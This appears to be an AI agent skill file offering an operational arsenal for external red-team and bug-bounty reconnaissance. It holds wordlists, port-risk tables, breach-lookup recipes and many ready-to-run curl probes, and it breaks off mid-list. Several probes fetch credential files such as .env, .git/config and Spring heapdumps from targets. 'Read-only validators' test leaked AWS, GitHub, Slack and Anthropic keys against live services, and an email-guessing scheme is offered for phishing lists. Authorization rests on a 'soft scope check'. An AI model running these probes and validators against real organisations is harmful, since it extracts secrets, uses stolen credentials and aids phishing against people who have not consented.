offensive-osint

star 4

Operational arsenal for external red-team and bug-bounty reconnaissance. Concrete wordlists (28 Swagger paths, 13 GraphQL paths, 35 high-risk ports, 6 missing-header findings, 15 always-on HTTP checks, 5 SAML paths, cloud bucket permutations, JS guess-paths, vendor product fingerprints for Citrix/F5/Pulse/Fortinet/Cisco/PaloAlto/VMware/Exchange, cloud-native service fingerprints, container/K8s exposure paths, CI/CD platform paths, documentation/wiki leak paths, WHOIS/RDAP, DNS record catalog, Wayback CDX recipes), 43+-pattern secret-regex catalog (incl. modern AI API keys: Anthropic/OpenAI/HuggingFace/Cloudflare/DigitalOcean/npm/PyPI/Docker Hub/Atlassian/DataDog/Sentry/ngrok), 80+ dork corpus across 9 categories, GitHub code-search dorks, copy-paste curl/httpie probes for every check, post-discovery enumeration workflows (AWS/GitHub/Slack/JWT/PMAK/Anthropic/OpenAI), endpoint interest scoring rubric (0–100), mobile app ownership confidence, identity-fabric endpoints (Entra/Okta/ADFS/Google/SAML/M365 Teams+Shar

Undermybelt By Undermybelt schedule Updated 6/7/2026

name: offensive-osint description: "Operational arsenal for external red-team and bug-bounty reconnaissance. Concrete wordlists (28 Swagger paths, 13 GraphQL paths, 35 high-risk ports, 6 missing-header findings, 15 always-on HTTP checks, 5 SAML paths, cloud bucket permutations, JS guess-paths, vendor product fingerprints for Citrix/F5/Pulse/Fortinet/Cisco/PaloAlto/VMware/Exchange, cloud-native service fingerprints, container/K8s exposure paths, CI/CD platform paths, documentation/wiki leak paths, WHOIS/RDAP, DNS record catalog, Wayback CDX recipes), 43+-pattern secret-regex catalog (incl. modern AI API keys: Anthropic/OpenAI/HuggingFace/Cloudflare/DigitalOcean/npm/PyPI/Docker Hub/Atlassian/DataDog/Sentry/ngrok), 80+ dork corpus across 9 categories, GitHub code-search dorks, copy-paste curl/httpie probes for every check, post-discovery enumeration workflows (AWS/GitHub/Slack/JWT/PMAK/Anthropic/OpenAI), endpoint interest scoring rubric (0–100), mobile app ownership confidence, identity-fabric endpoints (Entra/Okta/ADFS/Google/SAML/M365 Teams+SharePoint+OneDrive+OAuth + user-enum), GraphQL field-suggestion enumeration when introspection disabled, 9 read-only secret validators (Postman/AWS/GitHub/Slack/Anthropic/OpenAI/npm/Atlassian/DataDog), Postman workspace search (verified endpoint), Stack Exchange sweep, public SaaS dorks, email security analysis (SPF/DMARC/DKIM/BIMI/MTA-STS/DNSSEC), origin-discovery / CDN bypass techniques, TLS deep audit (sslyze/testssl.sh/JA3/JA4), reverse-DNS sweep + IPv6 enum, vulnerability prioritization data sources (NVD/EPSS/CISA KEV/ExploitDB/Metasploit), 27 attack-path hint templates, 80+ severity-matrix examples, LinkedIn employee enumeration, job posting tech-stack analysis, Slack/Discord workspace discovery, package registry leak hunting (npm/PyPI/Docker Hub/Quay/GHCR), sat imagery for physical recon, tooling quick-install one-liners, sector-specific recon notes (healthcare/finance/ICS-SCADA/IoT/government), runnable stdlib-only secret_scan.py helper, plus the existing tool references for username/email/phone/people/social/breach/infrastructure/crypto/media/geospatial/AI/archiving/automation. Use when you need concrete probe paths, regexes, payloads, scoring rules, curl one-liners, and tool URLs for an authorized external recon engagement." version: 2.1.1 triggers: - external recon - external red team - red team external - attack surface management - ASM - bug bounty recon - bug bounty - reconnaissance - footprinting - asset discovery - swagger discovery - openapi discovery - graphql introspection - graphql discovery - subdomain enumeration - subdomain takeover - cloud bucket enumeration - bucket enum - S3 enum - GCS enum - Azure blob enum - identity fabric - SSO discovery - IdP fingerprinting - tenant fingerprinting - okta enum - entra enum - azure AD enum - ADFS enum - SAML metadata - mobile recon - APK analysis - mobile attack surface - secret scanning - secret leak - leaked credential - github dorking - google dorking - bing dorking - DDG dorking - postman workspace - stack exchange OSINT - breach lookup - have I been pwned - HudsonRock cavalier - infostealer - dehashed - intelx - shodan recon - censys recon - certificate transparency - crt.sh - JARM - favicon mmh3 - JS endpoint extraction - sourcemap leak - copy paste probes - curl one-liner - email security analysis - SPF DMARC DKIM - origin discovery - CDN bypass - WAF bypass - vendor product fingerprints - Citrix Netscaler - F5 BIG-IP - Pulse Secure - FortiGate - PaloAlto GlobalProtect - Cisco AnyConnect - VMware vCenter - cloud native fingerprint - Lambda function URL - Cloud Run - kubernetes exposure - kubelet - etcd - CI CD exposure - Jenkins recon - GitLab self-hosted - GitHub Actions secrets - documentation leak - Notion public - Confluence anonymous - Trello board - WHOIS RDAP - DNS record catalog - Wayback CDX - LinkedIn enumeration - job posting tech stack - Slack workspace discovery - Discord server discovery - npm token leak - PyPI token leak - Docker Hub leak - sat imagery physical recon - TLS deep audit - JA3 JA4 - reverse DNS sweep - IPv6 enumeration - CVE prioritization - EPSS scoring - CISA KEV - vulnerability prioritization - tooling install - sector specific recon - healthcare DICOM - finance SWIFT - ICS SCADA - Modbus - BACnet - post discovery workflow - JWT triage - AWS key triage - GraphQL field suggestion - Anthropic API key - OpenAI API key - Microsoft 365 deep - Teams federation - SharePoint enum - OneDrive enum - hackerone reference - h1 hacktivity - disclosed reports - community bug reports - prior disclosures - bug bounty reference

Offensive OSINT — External Red-Team Arsenal

Companion skill: osint-methodology (the "how to think" skill). This skill is the "what to reach for." Use them together.

0. When to use / When NOT

Use this skill when:

  • You need concrete probe paths, wordlists, regexes, payloads, scoring rules, or tool URLs.
  • You're executing reconnaissance and need the actual technical reference (vs. methodology).
  • You're building a recon automation and need specific lists to seed it.

Do NOT use this skill when:

  • The user is asking for active exploitation, post-exploitation, or anything past reconnaissance.
  • The user is asking for defensive / blue-team detections.
  • The target's authorization isn't established — see §1.

1. Authorization & Legal Posture

For assets the operator owns or has written authorization to assess. Soft scope check before acting against an unverified third-party target — see methodology skill §1 for the full posture.


2. Confidence Levels

  • TENTATIVE — plausible based on indirect evidence (snippet-only dork match, single-source asset, inferred email pattern).
  • FIRM — directly observed (subdomain resolves, HEAD-confirmed bucket exists, banner returned).
  • CONFIRMED — verified via independent corroboration OR direct verification (live PMAK validation, multiple sources agree, listable bucket with object retrieval).

3. Output Format Conventions

Findings should carry: id, module, asset_key, category, severity (info/low/medium/high/critical), confidence, title, description, evidence (url + UTC timestamp + sha256 + raw ≤ 2 KiB), references, remediation. UTC timestamps everywhere.


4. Source Hygiene & Citations

URL + UTC timestamp + SHA-256 + tool version + run_id, every artifact. PNG screenshots, JSONL run logs, raw HTTP captures capped at 2 KiB body.


5. Do NOT

  • Don't paste creds/PII/session tokens into cloud LLMs.
  • Don't run destructive probes outside DEEP/--aggressive.
  • Don't use validated credentials for anything except read-only liveness check.
  • Don't single-source attribute.
  • Don't assume vendor labels are ground truth.

6. General OSINT (curated tool refs)

7. Search Engines

Tool Notes
Carrot2 Clusters results by topic
etools Metasearch
Kagi Privacy-first, non-personalized
Brave Search Independent index; Goggles for custom ranking
PDF Search PDF + table of contents
Google Fact Check Explorer Cross-site fact-check

8. Username & Email Investigation

Tool Purpose
Sherlock Username search across social networks
Maigret Profile collector by username
What's My Name Username search
Holehe Email registration check
Epieos Email pivots and metadata
OSINT Industries Email/username/phone lookups
Hunter.io Domain → emails
EmailRep Email reputation
Emailable Email verification
Mugetsu X/Twitter username history
RocketReach / Apollo Email enrichment + pattern guessing
PhoneInfoga Phone number intelligence

Browser extensions: GetProspect, SignalHire.


9. People Search


10. Phone Number OSINT


11. Email-Pattern Inference (TENTATIVE candidates)

Given a (first_name, last_name, domain), generate these 8 candidate addresses for breach pre-hits, phishing list curation, and downstream enrichment. Mark as TENTATIVE confidence until corroborated.

{first}.{last}@{domain}        # john.doe@example.com
{first}{last}@{domain}         # johndoe@example.com
{first}@{domain}               # john@example.com
{first[0]}{last}@{domain}      # jdoe@example.com
{first}.{last[0]}@{domain}     # john.d@example.com
{last}@{domain}                # doe@example.com
{first}_{last}@{domain}        # john_doe@example.com
{first}-{last}@{domain}        # john-doe@example.com

Lowercase before lookup. Strip diacritics for ASCII fallback. If the org uses a known pattern (e.g., Hunter.io shows {first}.{last} is dominant), prioritize that one and mark FIRM.


12. Email-Harvest Source Stack

Six parallel sources, dedup at the end:

  1. IntelX phonebook API — 2-step search + poll. Largest single source for breach-era addresses.
  2. Hunter.io — domain-search endpoint. ~25 free/month. Returns verified emails + roles.
  3. crt.sh — extract X.509 SAN extensions. Many certs include admin/contact emails.
  4. DuckDuckGo SERP scrape — HTML scrape of "@{target-domain}" results.
  5. Bing SERP scrape — same query, complementary index.
  6. Wayback CDX — historic snapshots of the target's homepage / contact / about pages often contain emails removed from the live site.

Email regex:

\b[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}\b

Noise filter (reject numeric-only locals):

^[0-9]+$

(Discards garbage like 12345@example.com from random tokens.)


13. Social Media

Platform Tool
Instagram Picuki — profile view without account
X/Twitter snscrape — preferred CLI scraper; Twint as fallback
Facebook Graph Search, sowsearch.info, lookup-id.com, whopostedwhat.com
Facebook (research) Meta Content Library — CrowdTangle successor (researcher-gated)
YouTube/Twitch Social Blade — analytics
TikTok Tokboard — trends + profile analytics
Reddit Reveddit — removed content; RedTrack.social — user history
Bluesky Firesky — real-time firehose; SkyView — follower graphs
Mastodon FediSearch — cross-instance search; Fedifinder — find Twitter users on Mastodon
Faces Search4Faces

14. Public Records & Company Information

14.1 RU registries

Rusprofile, Kontur.Focus (freemium), zakupki.gov.ru (procurement), EGRUL/EGRIP (official, captcha-gated).

14.2 CN registries + USCC + ICP

  • GSXTgsxt.gov.cn National Enterprise Credit Info; cross-check with Tianyancha / Qichacha.
  • USCC (Unified Social Credit Code) — 18-character entity ID assigned to all CN legal entities. Format: <region:6><authority:2><type:1><serial:9>. Useful for joining GSXT records to ICP filings.
  • ICP Beianbeian.miit.gov.cn — every domain serving traffic in mainland CN must register an ICP filing; the filing links the domain to a USCC, which links to the legal entity in GSXT.
  • Workflow: target.cn domain → ICP lookup → USCC → GSXT → entity name + officers + adjacent registered entities.

14.3 Sanctions & Compliance


15. Breach & Leak Data

15.0.1 HudsonRock Cavalier — direct API recipe

The web UI wraps a public, unauthenticated JSON API. Hit it directly:

# By domain (canonical first call)
curl -sk -m 30 "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-domain?domain=target.com" | jq .

# By email (single-account check)
curl -sk -m 30 "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-email?email=alice@target.com" | jq .

# By URL (when target's app is the breach victim)
curl -sk -m 30 "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-url?url=https://app.target.com" | jq .

PowerShell:

$hr = Invoke-RestMethod -Uri "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-domain?domain=$D" -TimeoutSec 30
"Employees: $($hr.employees) | Users: $($hr.users) | Third-party: $($hr.third_parties) | Total: $($hr.total)"
$hr.data.employees_urls | Sort-Object -Property occurrence -Descending | Select-Object -First 20
$hr.data.clients_urls   | Sort-Object -Property occurrence -Descending | Select-Object -First 15

Top-level JSON fields:

  • total — total stealer entries touching this domain.
  • totalStealers — global stealer-log corpus size (context only).
  • employees — count of <*>@<domain> accounts found.
  • users — count of accounts where the domain appeared as a visited URL (customers/vendors).
  • third_parties — accounts touching adjacent domains in the org.
  • data.employees_urls[]{occurrence, type, url} — internal apps where employees were logging in when stolen. Subdomain hits here = recon gold.
  • data.clients_urls[] — same shape; user-facing apps (often reveals undocumented public portals).
  • data.stealer_families[]{_key, _value} → which stealer (RedLine / Lumma / StealC / Vidar / Raccoon).
  • data.dates_compromised[]{_key, _value} → temporal distribution.

Free-tier caveats (CRITICAL to know):

  • Subdomain hostnames in data.*_urls[] past the first few are redacted with asterisks (*****.target.com). Pivot to paid Cavalier tier or other sources for unredacted.
  • Free endpoint returns counts + sample URLs only. Cleartext passwords + emails are never in the free response.
  • Rate limit ~1 req/sec/IP; 429 on burst. Sleep 1s between calls.
  • For unredacted creds + bulk enumeration → paid Cavalier portal.

Severity mapping (per §15.1 + §15.2): employees ≥ 10 → CRITICAL, regardless of whether the breached service is still online (legacy Lotus Domino / on-prem mail decommissioned + cloud SSO migration → employees almost always reuse passwords → SSO_EXPOSURE escalates CRITICAL).

15.1 Domain-Level Breach Severity Mapping

When you query a breach corpus by domain, map the result to severity like so:

Stat Severity
≥ 10 employees compromised CRITICAL
1–9 employees compromised HIGH
≥ 1 end-user (non-employee) compromised MEDIUM
Domain seen in breach with 0 named accounts INFO

Employees vs end-users distinction: an employee account is <anything>@<target-domain> (the breach victim is the target's own staff). An end-user account is the target's customer who reused a password — useful for credential-stuffing risk awareness but not directly compromising the target's identity fabric.

15.2 SSO_EXPOSURE finding

When a discovered SSO tenant (Entra GUID / Okta slug / Google Workspace domain) intersects with the breach corpus on its domain → SSO_EXPOSURE finding, severity CRITICAL. Evidence: tenant ID + product + employee count + per-account source attribution.

Legacy-mail-decommissioned pattern (high-value variant):

If mail.<domain> / webmail.<domain> returns NXDOMAIN today but HudsonRock/HIBP corpus still has historical employee credentials against it AND autodiscover.<domain> resolves to Microsoft IPs (M365) or aspmx.l.google.com MX (Workspace), the org migrated from on-prem to cloud — and the stolen passwords almost certainly survived the migration via password reuse. Escalate to CRITICAL SSO_EXPOSURE even when the legacy host is dead.

Concrete triggers (all three together):

  1. Resolve-DnsName mail.<domain> -Type A → NXDOMAIN (legacy gone)
  2. HudsonRock corpus has employee URLs against the old host (e.g. mail.<domain>/names.nsf for Lotus Domino, mail.<domain>/owa/ for Exchange, mail.<domain>/iwaredir.nsf for iNotes, mail.<domain>/zimbra/ for Zimbra)
  3. Current MX → M365 / Google Workspace / Zoho cloud (DNS confirms migration)

Evidence pack: tenant GUID + breach count + 3+ legacy URLs from corpus + autodiscover Microsoft IPs + current MX. Recommend forced password rotation + MFA audit + Conditional Access review.


16. Pre-built Wordlists & Probe Paths

Copy-pasteable arsenals, severity-annotated where relevant.

16.1 Swagger / OpenAPI discovery — 28 paths

Probe each path on every alive webapp. GET (or HEAD if rate-limited).

swagger.json
swagger.yaml
swagger/v1/swagger.json
swagger/v2/swagger.json
swagger-ui.html
swagger-ui/
swagger-resources
api-docs
api-docs.json
api/swagger
api/swagger.json
api/swagger-ui.html
api/v1/swagger.json
api/v2/swagger.json
api/v3/api-docs
v2/api-docs
v3/api-docs
openapi.json
openapi.yaml
openapi/v1
openapi/v3
docs
redoc
rapidoc
api/docs
api/documentation
.well-known/openapi

Severity:

  • Reachable Swagger/OpenAPI spec without auth → HIGH LEAKY_API_SPEC (full endpoint enumeration leaks; often reveals undocumented internal APIs).
  • Behind auth but accessible to any authenticated user → MEDIUM (still discloses internal API surface).

16.2 GraphQL discovery — 13 paths

graphql
graphiql
api/graphql
v1/graphql
v2/graphql
query
api/query
gql
altair
playground
subscriptions
graphql/console
api/v1/graphql

Standard introspection POST body:

{
  "operationName": "IntrospectionQuery",
  "query": "query IntrospectionQuery { __schema { types { name kind fields { name type { name kind } } } queryType { name } mutationType { name } subscriptionType { name } } }"
}

Severity:

  • Introspection returns schema without auth → HIGH OPEN_GRAPHQL_API.
  • Field-suggestion enumeration possible (server returns "did you mean" for typo'd field names) → MEDIUM (re-derive partial schema even when introspection is disabled).
  • /graphql accepts batched queries ([...] request body) → MEDIUM (rate-limit bypass surface; auth bypass via mixed batches).

UI markers (lower severity but still discoverable):

  • HTML response contains graphiql, playground, apollo studio, altair → GraphiQL UI exposed (often shipped accidentally on prod).

16.3 High-risk ports — 35 services

For each open port, emit a finding with the severity and "why an attacker cares" below. Source for the open-port observation: Shodan InternetDB (free, 1 req/sec) is the recommended starting point.

Port Service Severity Why it matters
21 FTP HIGH Anonymous read often enabled; cleartext creds.
22 SSH LOW Banner discloses version; brute-force surface.
23 Telnet HIGH Cleartext protocol; should never be exposed.
25 SMTP LOW Open relay risk; version banner.
53 DNS LOW Recursion = DDoS amplifier; AXFR opportunism.
80 HTTP INFO Standard.
110 POP3 LOW Cleartext if no STARTTLS.
111 rpcbind MEDIUM NFS exports enumeration.
135 MS RPC HIGH Enum via Impacket.
139 NetBIOS-SSN HIGH File/printer enum.
143 IMAP LOW Cleartext if no STARTTLS.
161 SNMP HIGH Community strings often public/private; full device enum.
389 LDAP HIGH Anonymous bind = full directory dump.
443 HTTPS INFO Standard.
445 SMB CRITICAL EternalBlue, SMB relay, anonymous shares.
465 SMTPS LOW Banner.
514 rsyslog MEDIUM Log injection / DoS.
587 SMTP-MSA LOW Banner.
631 IPP/CUPS MEDIUM Print server enum / RCE in old CUPS.
873 rsync HIGH Modules often listable; backup data exposure.
1433 MSSQL HIGH Brute-force; xp_cmdshell.
1521 Oracle TNS HIGH Brute-force; SID enum.
2049 NFS HIGH World-readable exports.
2375 Docker API (unencrypted) CRITICAL Unauthenticated container/host takeover.
2376 Docker API (TLS) HIGH Cert validation bypass risk.
3000 Common dev / Grafana MEDIUM Often Grafana / Express dev with default creds.
3306 MySQL HIGH Brute-force; default root:"".
3389 RDP CRITICAL BlueKeep / DejaBlue / NLA bypass.
5432 PostgreSQL HIGH Brute-force; default postgres:postgres.
5601 Kibana HIGH Often unauthenticated; Elasticsearch pivot.
5900 VNC HIGH Often unauthenticated or weak password.
5984 CouchDB HIGH Default no auth; admin party.
6379 Redis CRITICAL No auth default; write authorized_keys for SSH.
7001 WebLogic HIGH Frequent CVEs (CVE-2020-14882, etc.).
8000 Common dev MEDIUM Django, common dev servers.
8080 HTTP-alt MEDIUM Tomcat, Jenkins, common proxy.
8443 HTTPS-alt MEDIUM Same as 8080.
8888 Common dev / Jupyter HIGH Jupyter often exposes interactive shell.
9090 Cockpit / Prometheus HIGH Server admin UI / metrics scraping.
9200 Elasticsearch CRITICAL Typically no auth.
9300 Elasticsearch transport HIGH Cluster join + RCE.
11211 memcached MEDIUM UDP DDoS amp; data dump.
27017 MongoDB CRITICAL No auth by default.
50070 Hadoop NameNode HIGH HDFS browse.

When Shodan InternetDB returns vulns[] for a port, escalate the finding severity by one tier and include the CVE list in evidence.

16.4 Missing security headers — 6 findings

For every alive webapp, audit response headers. Each missing header below = one finding.

Header Severity (default) Severity (sensitive path) Notes
Strict-Transport-Security MEDIUM HIGH Sensitive paths: /login, /signin, /sso, /admin, /auth.
Content-Security-Policy MEDIUM MEDIUM XSS impact mitigation gone.
X-Frame-Options LOW LOW Clickjacking. (CSP frame-ancestors is the modern replacement.)
X-Content-Type-Options LOW LOW MIME-sniff XSS.
Referrer-Policy INFO INFO Outbound link leakage.
Permissions-Policy INFO INFO Feature-policy hardening.

16.5 Always-on HTTP checks — 15 paths

Run these against every alive webapp regardless of Nuclei availability. Cheap; high signal.

Path Finding Severity Match logic
/.git/config Exposed .git repo CRITICAL Body contains [core], [remote, repositoryformatversion
/.git/HEAD Exposed .git/HEAD HIGH Body matches ^ref:\s
/.env Exposed .env CRITICAL Multiline regex ^\s*[A-Z_][A-Z0-9_]*\s*=
/server-status Apache server-status MEDIUM Body contains Apache Server Status or matching title
/server-info Apache mod_info MEDIUM Body contains Apache Server Information
/.DS_Store Exposed .DS_Store LOW Byte signature \x00\x00\x00\x01Bud1
/phpinfo.php phpinfo() leak HIGH Body contains phpinfo(), PHP Version, or matching title
/info.php phpinfo() (alt path) HIGH Same as above
/actuator/env Spring Boot /actuator/env CRITICAL Body contains "propertySources", systemProperties, systemEnvironment
/actuator/heapdump Spring Boot heapdump CRITICAL HPROF magic bytes / large binary download
/_cat/indices Elasticsearch open HIGH Returns index list
/console Jenkins script console HIGH Body contains Jenkins/Script Console
/manager/html Tomcat Manager HIGH Body contains Tomcat Web Application Manager
/wp-admin/install.php Orphaned WP install LOW Body contains WordPress Installation
/.well-known/security.txt Disclosure policy info INFO Parse contact + policy fields

Plus parse /robots.txt for Disallow: paths — those become the next-tier wordlist for that target.

16.6 SAML metadata — 5 paths

/saml/metadata
/FederationMetadata/2007-06/FederationMetadata.xml
/federationmetadata/2007-06/federationmetadata.xml
/simplesaml/saml2/idp/metadata.php
/auth/saml2/metadata

Reachable SAML metadata XML reveals: EntityID, signing certs (often pinned → cert-reuse pivot), SingleSignOnService URL, NameIDFormat. Mark as MISCONFIG (LOW severity unless metadata leaks internal hostnames or non-public certs, then MEDIUM).

16.7 SSO subdomain prefixes — 8 prefixes

Probe each against root domain + every sibling brand domain:

auth.{domain}
login.{domain}
sso.{domain}
idp.{domain}
iam.{domain}
identity.{domain}
accounts.{domain}
oauth.{domain}

Plus probe /.well-known/openid-configuration on every alive subdomain (regardless of prefix).

16.8 Cloud bucket permutation arsenal

6 prefixes:

""           # bare candidate
backup-
assets-
static-
dev-
prod-

15 suffixes:

""           # bare candidate
-backup
-assets
-static
-media
-data
-uploads
-dev
-prod
-staging
-logs
-private
-public
-dump
-archive

47 generic stems (filter unless combined with target-identifying token):

www, mail, email, app, apps, web, webmail, ftp, cdn, static, assets, media, img, images,
videos, download, downloads, upload, uploads, data, files, docs, support, help, kb,
blog, news, dev, test, staging, stg, qa, uat, sandbox, preprod, preview, vpn,
mx, smtp, imap, pop, dns, ns, ns1, ns2, mx1, mx2

Provider URL templates:

S3:

https://{candidate}.s3.amazonaws.com/
https://{candidate}.s3-{region}.amazonaws.com/      # try us-east-1, us-west-2, eu-west-1, ap-southeast-1 first
https://s3.{region}.amazonaws.com/{candidate}/

GCS:

https://{candidate}.storage.googleapis.com/
https://storage.googleapis.com/{candidate}/

Azure Blob:

https://{candidate}.blob.core.windows.net/

Probe technique: HEAD first → 200/301 = exists, 403 = exists private, 404 = skip. On exists, GET root → if XML/JSON object listing returns, CRITICAL PUBLIC_CLOUD_BUCKET. Direct-URL object reads but not listable → HIGH PUBLIC_CLOUD_BUCKET_OBJECT_READ.

16.9 JS guess-paths for endpoint discovery

Probe these paths on every alive webapp (in addition to scraped <script src=...>):

/main.js
/app.js
/bundle.js
/runtime.js
/index.js
/vendor.js
/_next/static/_buildManifest.js
/_next/static/_ssgManifest.js
/static/js/main.js
/static/js/bundle.js
/assets/index.js
/static/js/main.<hash>.js                 # try hash discovery via 404 patterns

For every found JS, also try <jsfile>.map for sourcemap leaks (HIGH INFO_DISCLOSURE).

16.10 Endpoint extraction regex tiers

Three tiers, run in order on every JS body + every sourcesContent[] blob:

Tier 1 — generic quoted paths:

['"`](/[A-Za-z0-9_\-./{}\[\]?=&%:]+)['"`]

Match group: the path. High recall, lots of false positives — apply allowlist downstream.

Tier 2 — API-ish paths (biased filter on tier 1):

['"`](/(?:api|graphql|gql|v\d+|swagger|openapi|rest|services|internal|admin|auth|oauth|user|users|account|accounts|search|export|upload|file|files|download|webhook|hooks|callback|admin)/[A-Za-z0-9_\-./{}\[\]?=&%:]+)['"`]

Tier 3 — fully-qualified URLs:

\bhttps?://[A-Za-z0-9.\-]+\.[A-Za-z]{2,}(?::\d+)?[/A-Za-z0-9_\-./{}\[\]?=&%:#]*

Dedup on (method, normalized-path-template) where the template replaces /123/ with /{id}/ etc.

16.11 Internal-host leakage regexes

Run on every JS body + sourcesContent + APK strings + manifest:

RFC1918:

\b(?:10\.(?:\d{1,3}\.){2}\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.(?:\d{1,3})\.(?:\d{1,3})|192\.168\.(?:\d{1,3})\.(?:\d{1,3})|127\.(?:\d{1,3}\.){2}\d{1,3})\b

Internal DNS suffixes:

\b[A-Za-z0-9][A-Za-z0-9\-]{0,62}\.(?:internal|corp|lan|intranet|local|prod|staging|dev|qa|test)\b

Kubernetes service DNS:

\b[A-Za-z0-9\-]+\.[A-Za-z0-9\-]+\.svc(?:\.cluster\.local)?\b

Each match → MEDIUM INFO_DISCLOSURE. Aggregate per host: if many matches share the same internal subdomain, that's a recon seed for any future internal phase.

16.12 Subdomain-takeover provider fingerprints (summary, 27 providers)

Watch for these CNAME targets + the corresponding "available for claim" response signature:

Provider CNAME pattern Takeover signature
GitHub Pages *.github.io There isn't a GitHub Pages site here.
Heroku *.herokuapp.com No such app
AWS S3 *.s3*.amazonaws.com NoSuchBucket
AWS CloudFront *.cloudfront.net Bad request w/ specific X-Amz error
Azure (multiple) *.azurewebsites.net, *.blob.core.windows.net, *.cloudapp.net, *.trafficmanager.net Various per-product 404 patterns
Shopify shops.myshopify.com Sorry, this shop is currently unavailable.
Squarespace *.squarespace.com No Such Account
Tumblr *.tumblr.com Whatever you were looking for doesn't currently exist.
WordPress *.wordpress.com Do you want to register *.wordpress.com?
Fastly various Fastly-specific 404
Pantheon *.pantheonsite.io The gods are wise, but do not know of the site...
Surge.sh *.surge.sh project not found
Bitbucket Pages *.bitbucket.io Repository not found
Tilda *.tilda.ws Please renew your subscription
Strikingly *.s.strikinglydns.com PAGE NOT FOUND
Smartling *.smartling.com Domain is not configured
Ngrok *.ngrok.io Tunnel not found
Webflow *.webflow.io Site not found
Zendesk *.zendesk.com Help Center Closed
Cargo *.cargocollective.com 404 Not Found (with cargo branding)
Statuspage *.statuspage.io Not found
Intercom *.intercom.help Not found
Helpjuice *.helpjuice.com Not found
Helpscout *.helpscoutdocs.com Not found
Tictail *.tictail.com Not found
Brightcove *.brightcovegallery.com Not found
Smugmug various Not found

For full per-provider detection signatures + edge cases, use SubdomainX or Subzy/Subjack against a freshly-fetched fingerprint database.


16.13 Copy-Paste Probes (curl one-liners)

Every probe path in §16.1–16.12 with a runnable curl. Defaults: -sk (silent + ignore TLS errors), -m 10 (10s max), -o /tmp/r (response body to disk), -w '%{http_code}\n' (print status code), -A "Mozilla/5.0" (UA — change per persona).

Always-on HTTP checks (§16.5):

T="https://target.example"

# .git/config (CRITICAL)
curl -sk -m 10 "$T/.git/config" | grep -E '\[core\]|\[remote|repositoryformatversion'

# .git/HEAD (HIGH)
curl -sk -m 10 "$T/.git/HEAD" | grep -E '^ref:'

# .env (CRITICAL)
curl -sk -m 10 "$T/.env" | grep -E '^[[:space:]]*[A-Z_][A-Z0-9_]*[[:space:]]*='

# Apache /server-status (MEDIUM)
curl -sk -m 10 "$T/server-status" | grep -i 'Apache Server Status'

# Apache /server-info (MEDIUM)
curl -sk -m 10 "$T/server-info" | grep -i 'Apache Server Information'

# .DS_Store (LOW)
curl -sk -m 10 "$T/.DS_Store" -o /tmp/dsstore && file /tmp/dsstore | grep -i 'data'

# phpinfo.php (HIGH)
curl -sk -m 10 "$T/phpinfo.php" | grep -E 'phpinfo\(\)|PHP Version'

# info.php (HIGH)
curl -sk -m 10 "$T/info.php" | grep -E 'phpinfo\(\)|PHP Version'

# Spring Boot /actuator/env (CRITICAL)
curl -sk -m 10 "$T/actuator/env" | grep -E '"propertySources"|systemProperties|systemEnvironment'

# Spring Boot /actuator/heapdump (CRITICAL — saves binary; check size)
curl -sk -m 30 "$T/actuator/heapdump" -o /tmp/heap && file /tmp/heap | grep -i 'HPROF\|data'

# Elasticsearch open (HIGH)
curl -sk -m 10 "$T/_cat/indices?v"

# Jenkins script console (HIGH)
curl -sk -m 10 "$T/script" | grep -iE 'Jenkins|Script Console'

# Tomcat manager (HIGH)
curl -sk -m 10 "$T/manager/html" -w '%{http_code}\n' | tail -1     # 401 = present + auth-gated; 200 = no auth

# WordPress orphan installer (LOW)
curl -sk -m 10 "$T/wp-admin/install.php" | grep -i 'WordPress Installation'

# security.txt (INFO)
curl -sk -m 10 "$T/.well-known/security.txt"

SSO subdomain prefixes (§16.7):

D="target.example"
for prefix in auth login sso idp iam identity accounts oauth; do
  echo "=== ${prefix}.${D} ==="
  curl -sk -m 10 "https://${prefix}.${D}/.well-known/openid-configuration" -o /dev/null -w '%{http_code}\n'
done

# Generic OIDC discovery on any host:
curl -sk -m 10 "https://${HOST}/.well-known/openid-configuration" | jq .

SAML metadata paths (§16.6):

H="target.example.com"
for p in /saml/metadata \
         /FederationMetadata/2007-06/FederationMetadata.xml \
         /federationmetadata/2007-06/federationmetadata.xml \
         /simplesaml/saml2/idp/metadata.php \
         /auth/saml2/metadata; do
  echo "=== $p ==="
  curl -sk -m 10 "https://${H}${p}" -o /dev/null -w '%{http_code} %{size_download}\n'
done

Cloud bucket probes (§16.8):

B="candidate-bucket-name"

# S3 (us-east-1 first)
curl -sk -m 10 -I "https://${B}.s3.amazonaws.com/" -w 'STATUS:%{http_code}\n' | head -20
# If 200/301: list objects
curl -sk -m 10 "https://${B}.s3.amazonaws.com/?list-type=2" | head -50

# S3 region-specific
for r in us-east-1 us-west-2 eu-west-1 ap-southeast-1; do
  curl -sk -m 10 -I "https://${B}.s3-${r}.amazonaws.com/" -w "${r}: %{http_code}\n"
done

# GCS
curl -sk -m 10 -I "https://${B}.storage.googleapis.com/"
curl -sk -m 10 "https://storage.googleapis.com/${B}/"

# Azure Blob
curl -sk -m 10 -I "https://${B}.blob.core.windows.net/"
curl -sk -m 10 "https://${B}.blob.core.windows.net/?comp=list"

GraphQL introspection POST (§16.2):

H="https://target.example/graphql"

curl -sk -m 15 -X POST "$H" \
  -H 'Content-Type: application/json' \
  -d '{
    "operationName":"IntrospectionQuery",
    "query":"query IntrospectionQuery { __schema { types { name kind fields { name type { name kind } } } queryType { name } mutationType { name } subscriptionType { name } } }"
  }' | jq '.data.__schema.types | length'

Read-only secret validators (§23):

# Postman PMAK
curl -sk -m 10 -H "X-Api-Key: PMAK-..." https://api.getpostman.com/me | jq .

# AWS (use boto3 instead of curl — pre-signing complexity)
python3 -c "import boto3; print(boto3.client('sts', aws_access_key_id='AKIA...', aws_secret_access_key='...').get_caller_identity())"

# GitHub PAT (note scope header)
curl -sk -m 10 -H "Authorization: token ghp_..." https://api.github.com/user -D /tmp/h | jq -r '.login,.email'
grep -i 'X-OAuth-Scopes' /tmp/h

# Slack
curl -sk -m 10 -H "Authorization: Bearer xoxb-..." -X POST https://slack.com/api/auth.test | jq .

# Anthropic (read-only validation)
curl -sk -m 10 -H "x-api-key: sk-ant-..." -H "anthropic-version: 2023-06-01" https://api.anthropic.com/v1/models | jq '.data | length'

# OpenAI
